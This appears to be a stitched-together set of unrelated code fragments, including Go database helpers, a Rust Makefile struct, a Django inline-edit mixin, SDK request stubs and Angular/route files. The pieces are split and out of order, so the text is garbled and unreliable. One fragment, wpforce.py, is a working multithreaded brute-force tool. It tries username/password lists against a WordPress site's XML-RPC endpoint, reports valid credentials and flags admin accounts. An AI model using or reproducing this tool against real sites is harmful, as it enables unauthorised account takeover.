})
}
abort:
if err != nil {
return nf, err
}
// not aborted: set the loaded attributes
switch q.Section {
case msg.SectionRepositoryConfig:
(*q.Repository.Properties)[0].Service.Attributes = attrs
case msg.SectionBucket:
(*q.Bucket.Properties)[0].Service.Attributes = attrs
case msg.SectionGroup:
(*q.Group.Properties)[0].Service.Attributes = attrs
case msg.SectionCluster:
(*q.Cluster.Properties)[0].Service.Attributes = attrs
case msg.SectionNodeConfig:
(*q.Node.Properties)[0].Service.Attributes = attrs
}
return false, nil
}
// if the request is a check deletion, populate required IDs
func (g *GuidePost) fillCheckDeleteInfo(q *msg.Request) (bool, error) {
var delObjID, delObjTyp, delSrcChkID string
var err error
if err = g.stmtCheckDetailsForDelete.QueryRow(
q.CheckConfig.ID,
q.CheckConfig.RepositoryID,
).Scan(
&delObjID,
&delObjTyp,
&delSrcChkID,
); err != nil {
if err == sql.ErrNoRows {
| return false, err
}
q.CheckConfig.ObjectID = delObjID
q.CheckConfig.ObjectType = delObjTyp
q.CheckConfig.ExternalID = delSrcChkID
return false, nil
}
// if the request is a property deletion, populate required IDs
func (g *GuidePost) fillPropertyDeleteInfo(q *msg.Request) (bool, error) {
var (
err error
row *sql.Row
queryStmt, view, sysProp, value, cstID, cstProp string
svcID, oncID, oncName string
oncNumber int
)
// select SQL statement
switch q.Section {
case msg.SectionRepositoryConfig:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.RepoSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.RepoCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.RepoServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.RepoOncallPropertyForDelete
}
case msg.SectionBucket:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.BucketSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.BucketCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.BucketServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.BucketOncallPropertyForDelete
}
case msg.SectionGroup:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.GroupSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.GroupCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.GroupServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.GroupOncallPropertyForDelete
}
case msg.SectionCluster:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.ClusterSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.ClusterCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.ClusterServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.ClusterOncallPropertyForDelete
}
case msg.SectionNodeConfig:
switch q.Property.Type {
case msg.PropertySystem:
queryStmt = stmt.NodeSystemPropertyForDelete
case msg.PropertyCustom:
queryStmt = stmt.NodeCustomPropertyForDelete
case msg.PropertyService:
queryStmt = stmt.NodeServicePropertyForDelete
case msg.PropertyOncall:
queryStmt = stmt.NodeOncallPropertyForDelete
}
}
// execute and scan
switch q.Section {
case msg.SectionRepository, msg.SectionRepositoryConfig:
row = g.conn.QueryRow(queryStmt,
(*q.Repository.Properties)[0].SourceInstanceID)
case msg.SectionBucket:
row = g.conn.QueryRow(queryStmt,
(*q.Bucket.Properties)[0].SourceInstanceID)
case msg.SectionGroup:
row = g.conn.QueryRow(queryStmt,
(*q.Group.Properties)[0].SourceInstanceID)
case msg.SectionCluster:
row = g.conn.QueryRow(queryStmt,
(*q.Cluster.Properties)[0].SourceInstanceID)
case msg.SectionNodeConfig:
row = g.conn.QueryRow(queryStmt,
(*q.Node.Properties)[0].SourceInstanceID)
}
switch q.Property.Type {
case msg.PropertySystem:
err = row.Scan(&view, &sysProp, &value)
case msg.PropertyCustom:
err = row.Scan(&view, &cstID, &value, &cstProp)
case msg.PropertyService:
err = row.Scan(&view, &svcID)
case msg.PropertyOncall:
err = row.Scan(&view, &oncID, &oncName, &oncNumber)
}
if err != nil {
if err == sql.ErrNoRows {
return true, fmt.Errorf(
"Failed to find source property for %s",
(*q.Repository.Properties)[0].SourceInstanceID)
}
return false, err
}
// assemble and set results: property specification
var (
pSys *proto.PropertySystem
pCst *proto.PropertyCustom
pSvc *proto.PropertyService
pOnc *proto.PropertyOncall
)
switch q.Property.Type {
case msg.PropertySystem:
pSys = &proto.PropertySystem{
Name: sysProp,
Value: value,
}
case msg.PropertyCustom:
pCst = &proto.PropertyCustom{
ID: cstID,
Name: cstProp,
Value: value,
}
case msg.PropertyService:
pSvc = &proto.PropertyService{
ID: svcID,
}
case msg.PropertyOncall:
num := strconv.Itoa(oncNumber)
pOnc = &proto.PropertyOncall{
ID: oncID,
Name: oncName,
Number: num,
}
}
// assemble and set results: view
switch q.Section {
case msg.SectionRepositoryConfig:
(*q.Repository.Properties)[0].View = view
case msg.SectionBucket:
(*q.Bucket.Properties)[0].View = view
case msg.SectionGroup:
(*q.Group.Properties)[0].View = view
case msg.SectionCluster:
(*q.Cluster.Properties)[0].View = view
case msg.SectionNodeConfig:
(*q.Node.Properties)[0].View = view
}
// final assembly step
switch q.Section {
case msg.SectionRepositoryConfig:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Repository.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Repository.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Repository.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Repository.Properties)[0].Oncall = pOnc
}
case msg.SectionBucket:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Bucket.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Bucket.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Bucket.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Bucket.Properties)[0].Oncall = pOnc
}
case msg.SectionGroup:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Group.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Group.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Group.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Group.Properties)[0].Oncall = pOnc
}
case msg.SectionCluster:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Cluster.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Cluster.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Cluster.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Cluster.Properties)[0].Oncall = pOnc
}
case msg.SectionNodeConfig:
switch q.Property.Type {
case msg.PropertySystem:
(*q.Node.Properties)[0].System = pSys
case msg.PropertyCustom:
(*q.Node.Properties)[0].Custom = pCst
case msg.PropertyService:
(*q.Node.Properties)[0].Service = pSvc
case msg.PropertyOncall:
(*q.Node.Properties)[0].Oncall = pOnc
}
}
return false, err
}
// vim: ts=4 sw=4 sts=4 noet fenc=utf-8 ffs=unix
| return true, fmt.Errorf(
"Failed to find source check for config %s",
q.CheckConfig.ID)
}
|
lib.rs | extern crate regex;
mod lint;
pub use lint::*;
mod parse;
pub use parse::*;
#[derive(Default, Debug)]
pub struct | {
rules: Vec<Rule>,
vars: Vec<Var>,
}
impl Makefile {
fn new() -> Makefile {
Makefile { ..Default::default() }
}
fn add_rule(&mut self, rule: Rule) {
self.rules.push(rule);
}
fn add_var(&mut self, var: Var) {
self.vars.push(var);
}
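    /// Append a continuation line to the body of the most recently added
    /// rule, if one exists.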
fn rule_line(&mut self, line: String) {
if let Some(mut last) = self.rules.pop() {
last.body.push(line);
self.rules.push(last);
}
}
}
#[derive(Debug, Default)]
pub struct Rule {
target: String,
dependencies: Vec<String>,
line: usize,
body: Vec<String>,
}
#[derive(Debug)]
pub enum Var {
Eq(String, String, usize),
ColonEq(String, String, usize),
DoubleColonEq(String, String, usize),
PlusEq(String, String, usize),
QuestionEq(String, String, usize),
Special(String, String, usize)
}
#[cfg(test)]
mod tests {
#[test]
fn it_works() {}
}
| Makefile |
wpforce.py | import sys
import time
import socket
import urllib2
import argparse
import threading
__author__ = 'n00py'
# These variables must be shared by all threads dynamically
correct_pairs = {}
total = 0
def has_colours(stream):
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # auto color only on TTYs
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
return False
has_colours = has_colours(sys.stdout)
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def printout(text, colour=WHITE):
if has_colours:
seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text)
def slice_list(input, size):
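    # Behavior sketch: splits `input` into `size` chunks, handing the remainder
    # out one item per chunk to the first chunks, e.g. slice_list([1, 2, 3, 4, 5], 2)
    # yields [[1, 2, 3], [4, 5]].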
input_size = len(input)
slice_size = input_size / size
remain = input_size % size
result = []
iterator = iter(input)
for i in range(size):
result.append([])
for j in range(slice_size):
result[i].append(iterator.next())
if remain:
result[i].append(iterator.next())
remain -= 1
return result
def worker(wordlist,thread_no,url,userlist,verbose,debug,agent):
global total
global correct_pairs
for n in wordlist:
current_pass = wordlist.index(n)
for x in userlist:
current_user = userlist.index(x)
user = userlist[current_user]
password = wordlist[current_pass]
if user not in correct_pairs:
if user != "":
if password != "":
PasswordAttempt(user,password,url,thread_no,verbose,debug,agent)
total += 1
def BuildThreads(list_array,url,debug,userlist,verbose,agent):
if debug:
print "Here is the content of the wordlists for each thread"
for i in range(len(list_array)):
print "Thread " + str(i)
printout(str(list_array[i]), YELLOW)
print "\n-----------------------------------------------------"
threads = []
for i in range(len(list_array)):
t = threading.Thread(target=worker, args=(list_array[i], i, url,userlist,verbose,debug,agent))
t.daemon = True
threads.append(t)
t.start()
def PrintBanner(input,wordlist,url,userlist,passlist):
banner = """\
,-~~-.___. __ __ ____ _____
/ | x \ \ \ / /| _ \ | ___|___ _ __ ___ ___
( ) 0 \ \ /\ / / | |_) || |_ / _ \ | '__|/ __|/ _ \.
\_/-, ,----' ____ \ V V / | __/ | _|| (_) || | | (__| __/
==== || \_ \_/\_/ |_| |_| \___/ |_| \___|\___|
/ \-'~; || | v.1.0.0
/ __/~| ...||__/|-" Brute Force Attack Tool for Wordpress
=( _____||________| ~n00py~
"""
print banner
print ("Username List: %s" % input) + " (" + str(len(userlist)) + ")"
print ("Password List: %s" % wordlist) + " (" + str(len(passlist)) + ")"
print ("URL: %s" % url)
def TestSite(url):
protocheck(url)
print "Trying: " + url
try:
urllib2.urlopen(url, timeout=3)
except urllib2.HTTPError, e:
if e.code == 405:
print url + " found!"
print "Now the brute force will begin! >:)"
if e.code == 404:
printout(str(e), YELLOW)
print " - XMLRPC has been moved, removed, or blocked"
sys.exit()
except urllib2.URLError, g:
printout("Could not identify XMLRPC. Please verify the domain.\n", YELLOW)
sys.exit()
except socket.timeout as e:
print type(e)
printout("The socket timed out, try it again.", YELLOW)
sys.exit()
def PasswordAttempt(user, password, url, thread_no,verbose,debug,agent):
if verbose is True or debug is True:
if debug is True:
thready = "[Thread " + str(thread_no) + "]"
printout(thready, YELLOW)
print "Trying " + user + " : " + password + "\n",
headers = {'User-Agent': agent,
'Connection': 'keep-alive',
'Accept': 'text/html'
}
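    # The XML-RPC body below calls wp.getUsersBlogs, which validates the
    # credentials; a successful login returns blog info containing an
    # isAdmin flag, which is what the response parsing below looks for.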
post = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>" + user + "</string></value></param><param><value><string>" + password + "</string></value></param></params></methodCall>"
try:
req = urllib2.Request(url, post, headers)
response = urllib2.urlopen(req, timeout=3)
the_page = response.read()
look_for = "isAdmin"
try:
splitter = the_page.split(look_for, 1)[1]
correct_pairs[user] = password
print "--------------------------"
success = "[" + user + " : " + password + "] are valid credentials! "
adminAlert = ""
if splitter[23] == "1":
adminAlert = "- THIS ACCOUNT IS ADMIN"
printout(success, GREEN)
printout(adminAlert, RED)
print "\n--------------------------"
except:
pass
except urllib2.URLError, e:
if e.code == 404 or e.code == 403:
global total
printout(str(e), YELLOW)
print " - WAF or security plugin likely in use"
total = len(passlist)
sys.exit()
else:
printout(str(e), YELLOW)
print " - Try reducing Thread count "
            if verbose is True or debug is True:
print user + ":" + password + " was skipped"
except socket.timeout as e:
printout(str(e), YELLOW)
print " - Try reducing Thread count "
        if verbose is True or debug is True:
print user + ":" + password + " was skipped"
except socket.error as e:
printout(str(e), YELLOW)
print " - Got an RST, Probably tripped the firewall\n",
total = len(passlist)
sys.exit()
def protocheck(url):
if "http" not in url:
printout("Please include the protocol in the URL\n", YELLOW)
sys.exit()
def main():
|
if __name__ == "__main__":
main()
    # passlist is read by PasswordAttempt() in worker threads, so it must be module-level
    global passlist
    parser = argparse.ArgumentParser(description='This is a tool to brute force Wordpress using the Wordpress API')
parser.add_argument('-i','--input', help='Input file name',required=True)
parser.add_argument('-w','--wordlist',help='Wordlist file name', required=True)
parser.add_argument('-u','--url',help='URL of target', required=True)
    parser.add_argument('-v','--verbose',help=' Verbose output. Show the attempts as they happen.', required=False, action='store_true')
parser.add_argument('-t','--threads',help=' Determines the number of threads to be used, default is 10', type=int, default=10, required=False)
parser.add_argument('-a','--agent',help=' Determines the user-agent', type=str, default="WPForce Wordpress Attack Tool 1.0", required=False)
parser.add_argument('-d','--debug',help=' This option is used for determining issues with the script.', action='store_true', required=False)
args = parser.parse_args()
url = args.url
if url.endswith('/'):
url = url[:-1]
url += '/xmlrpc.php'
u = open(args.input, 'r')
userlist = u.read().split('\n')
totalusers = len(userlist)
f = open(args.wordlist, 'r')
passlist = f.read().split('\n')
PrintBanner(args.input,args.wordlist,args.url,userlist,passlist)
TestSite(url)
list_array = slice_list(passlist, args.threads)
BuildThreads(list_array,url,args.debug,userlist,args.verbose,args.agent)
while (len(correct_pairs) <= totalusers) and (len(passlist) > total):
time.sleep(0.1)
sys.stdout.flush()
percent = "%.0f%%" % (100 * (total)/len(passlist))
print " " + percent + " Percent Complete\r",
print "\nAll correct pairs:"
printout(str(correct_pairs), GREEN)
print "" |
xeditable.py | # -*- encoding: utf-8 -*-
import json
import re
import operator
import logging
from ..forms import XEditableUpdateForm
from .base import DatatableView
from django import get_version
from django.http import HttpResponse, HttpResponseBadRequest
from django.views.decorators.csrf import ensure_csrf_cookie
from django.db.models import ForeignKey
log = logging.getLogger(__name__)
# Django >= 1.5 supports save(update_fields=...); parse only the numeric
# version components so pre-releases like '1.11rc1' do not break the check.
CAN_UPDATE_FIELDS = tuple(int(n) for n in re.findall(r'\d+', get_version())[:2]) >= (1, 5)
class | (object):
xeditable_form_class = XEditableUpdateForm
xeditable_fieldname_param = 'xeditable_field' # GET parameter name used for choices ajax
def get(self, request, *args, **kwargs):
""" Introduces the ``ensure_csrf_cookie`` decorator and handles xeditable choices ajax. """
if request.GET.get(self.xeditable_fieldname_param):
return self.get_ajax_xeditable_choices(request, *args, **kwargs)
# Doing this in the method body at runtime instead of at declaration-time helps prevent
# collisions of other subclasses also trying to decorate their own get() methods.
method = super(XEditableMixin, self).get
method = ensure_csrf_cookie(method)
return method(request, *args, **kwargs)
def get_ajax_xeditable_choices(self, request, *args, **kwargs):
""" AJAX GET handler for xeditable queries asking for field choice lists. """
field_name = request.GET.get(self.xeditable_fieldname_param)
if not field_name:
return HttpResponseBadRequest("Field name must be given")
queryset = self.get_queryset()
if not self.model:
self.model = queryset.model
# Sanitize the requested field name by limiting valid names to the datatable_options columns
from datatableview.views import legacy
if isinstance(self, legacy.LegacyDatatableMixin):
columns = self._get_datatable_options()['columns']
for name in columns:
if isinstance(name, (list, tuple)):
name = name[1]
if name == field_name:
break
else:
return HttpResponseBadRequest("Invalid field name")
else:
if field_name not in self.get_datatable().config['columns']:
return HttpResponseBadRequest("Invalid field name")
field = self.model._meta.get_field_by_name(field_name)[0]
choices = self.get_field_choices(field, field_name)
return HttpResponse(json.dumps(choices))
def post(self, request, *args, **kwargs):
"""
Builds a dynamic form that targets only the field in question, and saves the modification.
"""
self.object_list = None
form = self.get_xeditable_form(self.get_xeditable_form_class())
if form.is_valid():
obj = self.get_update_object(form)
if obj is None:
data = json.dumps({
'status': 'error',
'message': "Object does not exist."
})
return HttpResponse(data, content_type="application/json", status=404)
return self.update_object(form, obj)
else:
data = json.dumps({
'status': 'error',
'message': "Invalid request",
'form_errors': form.errors,
})
return HttpResponse(data, content_type="application/json", status=400)
def get_xeditable_form_class(self):
""" Returns ``self.xeditable_form_class``. """
return self.xeditable_form_class
def get_xeditable_form_kwargs(self):
""" Returns a dict of keyword arguments to be sent to the xeditable form class. """
kwargs = {
'model': self.get_queryset().model,
}
if self.request.method in ('POST', 'PUT'):
kwargs.update({
'data': self.request.POST,
})
return kwargs
def get_xeditable_form(self, form_class):
""" Builds xeditable form computed from :py:meth:`.get_xeditable_form_class`. """
return form_class(**self.get_xeditable_form_kwargs())
def get_update_object(self, form):
"""
Retrieves the target object based on the update form's ``pk`` and the table's queryset.
"""
pk = form.cleaned_data['pk']
queryset = self.get_queryset()
try:
obj = queryset.get(pk=pk)
except queryset.model.DoesNotExist:
obj = None
return obj
def update_object(self, form, obj):
""" Saves the new value to the target object. """
field_name = form.cleaned_data['name']
value = form.cleaned_data['value']
setattr(obj, field_name, value)
save_kwargs = {}
if CAN_UPDATE_FIELDS:
save_kwargs['update_fields'] = [field_name]
obj.save(**save_kwargs)
data = json.dumps({
'status': 'success',
})
return HttpResponse(data, content_type="application/json")
def get_field_choices(self, field, field_name):
"""
Returns the valid choices for ``field``. The ``field_name`` argument is given for
convenience.
"""
if self.request.GET.get('select2'):
names = ['id', 'text']
else:
names = ['value', 'text']
        choices_getter = getattr(self, 'get_field_%s_choices' % field_name, None)
if choices_getter is None:
if isinstance(field, ForeignKey):
choices_getter = self._get_foreignkey_choices
else:
choices_getter = self._get_default_choices
return [dict(zip(names, choice)) for choice in choices_getter(field, field_name)]
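        # Result shape (sketch): [{'value': 1, 'text': 'First'}, ...], or
        # [{'id': 1, 'text': 'First'}, ...] when the request includes the
        # select2 GET parameter.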
def _get_foreignkey_choices(self, field, field_name):
formfield_kwargs = {}
if not field.blank:
# Explicitly remove empty choice, since formfield isn't working with instance data and
# will consequently try to assume initial=None, forcing the blank option to appear.
formfield_kwargs['empty_label'] = None
formfield = field.formfield(**formfield_kwargs)
return formfield.choices
def _get_default_choices(self, field, field_name):
return field.choices
class XEditableDatatableView(XEditableMixin, DatatableView):
pass
| XEditableMixin |
begin_contact_flow_version_modification.go | package cloudcallcenter
//Licensed under the Apache License, Version 2.0 (the "License");
//you may not use this file except in compliance with the License.
//You may obtain a copy of the License at
//
//http://www.apache.org/licenses/LICENSE-2.0
//
//Unless required by applicable law or agreed to in writing, software
//distributed under the License is distributed on an "AS IS" BASIS,
//WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//See the License for the specific language governing permissions and
//limitations under the License.
//
// Code generated by Alibaba Cloud SDK Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
import (
"github.com/aliyun/alibaba-cloud-sdk-go/sdk/requests"
"github.com/aliyun/alibaba-cloud-sdk-go/sdk/responses"
)
// BeginContactFlowVersionModification invokes the cloudcallcenter.BeginContactFlowVersionModification API synchronously
// api document: https://help.aliyun.com/api/cloudcallcenter/begincontactflowversionmodification.html
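// Example (sketch only, not part of the generated SDK; the region and IDs are placeholders):
//   client, err := NewClientWithAccessKey("cn-shanghai", "<accessKeyId>", "<accessKeySecret>")
//   request := CreateBeginContactFlowVersionModificationRequest()
//   request.InstanceId = "<instanceId>"
//   request.ContactFlowId = "<contactFlowId>"
//   response, err := client.BeginContactFlowVersionModification(request)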
func (client *Client) BeginContactFlowVersionModification(request *BeginContactFlowVersionModificationRequest) (response *BeginContactFlowVersionModificationResponse, err error) {
response = CreateBeginContactFlowVersionModificationResponse()
err = client.DoAction(request, response)
return
}
// BeginContactFlowVersionModificationWithChan invokes the cloudcallcenter.BeginContactFlowVersionModification API asynchronously
// api document: https://help.aliyun.com/api/cloudcallcenter/begincontactflowversionmodification.html
// asynchronous document: https://help.aliyun.com/document_detail/66220.html
func (client *Client) BeginContactFlowVersionModificationWithChan(request *BeginContactFlowVersionModificationRequest) (<-chan *BeginContactFlowVersionModificationResponse, <-chan error) {
responseChan := make(chan *BeginContactFlowVersionModificationResponse, 1)
errChan := make(chan error, 1)
err := client.AddAsyncTask(func() {
defer close(responseChan)
defer close(errChan)
response, err := client.BeginContactFlowVersionModification(request)
if err != nil {
errChan <- err
} else {
responseChan <- response
}
})
if err != nil {
errChan <- err
close(responseChan)
close(errChan)
}
return responseChan, errChan
}
// BeginContactFlowVersionModificationWithCallback invokes the cloudcallcenter.BeginContactFlowVersionModification API asynchronously
// api document: https://help.aliyun.com/api/cloudcallcenter/begincontactflowversionmodification.html
// asynchronous document: https://help.aliyun.com/document_detail/66220.html
func (client *Client) BeginContactFlowVersionModificationWithCallback(request *BeginContactFlowVersionModificationRequest, callback func(response *BeginContactFlowVersionModificationResponse, err error)) <-chan int {
result := make(chan int, 1)
err := client.AddAsyncTask(func() {
var response *BeginContactFlowVersionModificationResponse
var err error
defer close(result)
response, err = client.BeginContactFlowVersionModification(request)
callback(response, err)
result <- 1
})
if err != nil {
defer close(result)
callback(nil, err)
result <- 0
}
return result
}
// BeginContactFlowVersionModificationRequest is the request struct for api BeginContactFlowVersionModification
type BeginContactFlowVersionModificationRequest struct {
*requests.RpcRequest
ContactFlowId string `position:"Body" name:"ContactFlowId"`
InstanceId string `position:"Body" name:"InstanceId"`
}
// BeginContactFlowVersionModificationResponse is the response struct for api BeginContactFlowVersionModification
type BeginContactFlowVersionModificationResponse struct {
*responses.BaseResponse
RequestId string `json:"RequestId" xml:"RequestId"`
Success bool `json:"Success" xml:"Success"`
Code string `json:"Code" xml:"Code"`
Message string `json:"Message" xml:"Message"`
HttpStatusCode int `json:"HttpStatusCode" xml:"HttpStatusCode"`
ContactFlow ContactFlow `json:"ContactFlow" xml:"ContactFlow"`
}
// CreateBeginContactFlowVersionModificationRequest creates a request to invoke BeginContactFlowVersionModification API
func CreateBeginContactFlowVersionModificationRequest() (request *BeginContactFlowVersionModificationRequest) |
// CreateBeginContactFlowVersionModificationResponse creates a response to parse from BeginContactFlowVersionModification response
func CreateBeginContactFlowVersionModificationResponse() (response *BeginContactFlowVersionModificationResponse) {
response = &BeginContactFlowVersionModificationResponse{
BaseResponse: &responses.BaseResponse{},
}
return
}
| {
request = &BeginContactFlowVersionModificationRequest{
RpcRequest: &requests.RpcRequest{},
}
request.InitWithApiInfo("CloudCallCenter", "2017-07-05", "BeginContactFlowVersionModification", "", "")
request.Method = requests.POST
return
} |
installed_apps_response.go | package installedapps
import (
i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55 "github.com/microsoft/kiota/abstractions/go/serialization"
i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87 "github.com/microsoftgraph/msgraph-sdk-go/models/microsoft/graph"
)
// InstalledAppsResponse
type InstalledAppsResponse struct {
// Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
additionalData map[string]interface{};
//
nextLink *string;
//
value []i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation;
}
// NewInstalledAppsResponse instantiates a new installedAppsResponse and sets the default values.
func NewInstalledAppsResponse()(*InstalledAppsResponse) {
m := &InstalledAppsResponse{
}
m.SetAdditionalData(make(map[string]interface{}));
return m
}
// GetAdditionalData gets the AdditionalData property value. Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
func (m *InstalledAppsResponse) GetAdditionalData()(map[string]interface{}) {
if m == nil {
return nil
} else {
return m.additionalData
}
}
// GetNextLink gets the nextLink property value.
func (m *InstalledAppsResponse) GetNextLink()(*string) {
if m == nil | else {
return m.nextLink
}
}
// GetValue gets the value property value.
func (m *InstalledAppsResponse) GetValue()([]i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation) {
if m == nil {
return nil
} else {
return m.value
}
}
// GetFieldDeserializers the deserialization information for the current model
func (m *InstalledAppsResponse) GetFieldDeserializers()(map[string]func(interface{}, i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode)(error)) {
res := make(map[string]func(interface{}, i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode)(error))
res["@odata.nextLink"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetStringValue()
if err != nil {
return err
}
if val != nil {
m.SetNextLink(val)
}
return nil
}
res["value"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetCollectionOfObjectValues(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.NewTeamsAppInstallation() })
if err != nil {
return err
}
if val != nil {
res := make([]i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation, len(val))
for i, v := range val {
res[i] = *(v.(*i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation))
}
m.SetValue(res)
}
return nil
}
return res
}
func (m *InstalledAppsResponse) IsNil()(bool) {
return m == nil
}
// Serialize serializes information the current object
func (m *InstalledAppsResponse) Serialize(writer i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.SerializationWriter)(error) {
{
err := writer.WriteStringValue("@odata.nextLink", m.GetNextLink())
if err != nil {
return err
}
}
{
cast := make([]i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable, len(m.GetValue()))
for i, v := range m.GetValue() {
temp := v
cast[i] = i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable(&temp)
}
err := writer.WriteCollectionOfObjectValues("value", cast)
if err != nil {
return err
}
}
{
err := writer.WriteAdditionalData(m.GetAdditionalData())
if err != nil {
return err
}
}
return nil
}
// SetAdditionalData sets the AdditionalData property value. Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
func (m *InstalledAppsResponse) SetAdditionalData(value map[string]interface{})() {
m.additionalData = value
}
// SetNextLink sets the nextLink property value.
func (m *InstalledAppsResponse) SetNextLink(value *string)() {
m.nextLink = value
}
// SetValue sets the value property value.
func (m *InstalledAppsResponse) SetValue(value []i4a838ef194e4c99e9f2c63ba10dab9cb120a89367c1d4ab0daa63bb424e20d87.TeamsAppInstallation)() {
m.value = value
}
| {
return nil
} |
hctk.d.ts | declare type Cedict = Record<string, string>; | ||
docs.component.ts | /**
* @license
* Copyright Akveo. All Rights Reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*/
import { Component, OnDestroy } from '@angular/core';
import { Router } from '@angular/router';
import { Subscription } from 'rxjs/Subscription';
import 'rxjs/add/operator/merge';
import { NbMenuItem } from '@nebular/theme';
import { NbMenuInternalService } from '@nebular/theme/components/menu/menu.service';
import { DocsService } from './docs.service';
| selector: 'ngd-docs',
styleUrls: ['docs.component.scss'],
template: `
<nb-layout>
<nb-layout-header fixed>
<ngd-header></ngd-header>
</nb-layout-header>
<nb-sidebar>
<nb-menu [items]="menuItems" tag="leftMenu"></nb-menu>
</nb-sidebar>
<nb-layout-column>
<router-outlet></router-outlet>
</nb-layout-column>
</nb-layout>
`,
})
export class NgdDocsComponent implements OnDestroy {
structure: any;
menuItems: NbMenuItem[] = [];
private routerSubscription: Subscription;
constructor(private service: DocsService,
private router: Router,
private menuInternalService: NbMenuInternalService) {
this.menuItems = this.service.getPreparedMenu();
this.structure = this.service.getPreparedStructure();
this.routerSubscription = this.router.events
.subscribe((event) => {
if (event['url'] === '/docs') {
const firstMenuItem = this.menuItems[0].children[0];
this.menuInternalService.itemSelect(firstMenuItem);
          // Angular bug with replaceUrl; temporary fix with setTimeout
setTimeout(() => this.router.navigateByUrl(firstMenuItem.link, { replaceUrl: true }));
}
});
}
ngOnDestroy() {
this.routerSubscription.unsubscribe();
}
} | import 'rxjs/add/operator/filter';
@Component({ |
apis.audit.route.ts | /*
* Copyright (C) 2015 The Gravitee team (http://gravitee.io)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import AuditService from '../../../services/audit.service';
export default apisAuditRouterConfig;
function | ($stateProvider) {
'ngInject';
$stateProvider
.state('management.apis.detail.audit', {
template: require('./apis.audit.route.html')
})
.state('management.apis.detail.audit.general', {
url: '/audit',
template: require('./general/audit.html'),
controller: 'ApiAuditController',
controllerAs: 'auditCtrl',
data: {
menu: {
label: 'Audit',
icon: 'visibility',
},
perms: {
only: ['api-audit-r']
},
docs: {
page: 'management-api-audit'
}
},
resolve: {
resolvedEvents:
(AuditService: AuditService, $stateParams) => AuditService.listEvents($stateParams.apiId).then(response => response.data)
}
})
.state('management.apis.detail.audit.history', {
url: '/history',
template: require('./history/apiHistory.html'),
controller: 'ApiHistoryController',
controllerAs: 'apiHistoryCtrl',
resolve: {
resolvedEvents: function ($stateParams, ApiService) {
var eventTypes = 'PUBLISH_API';
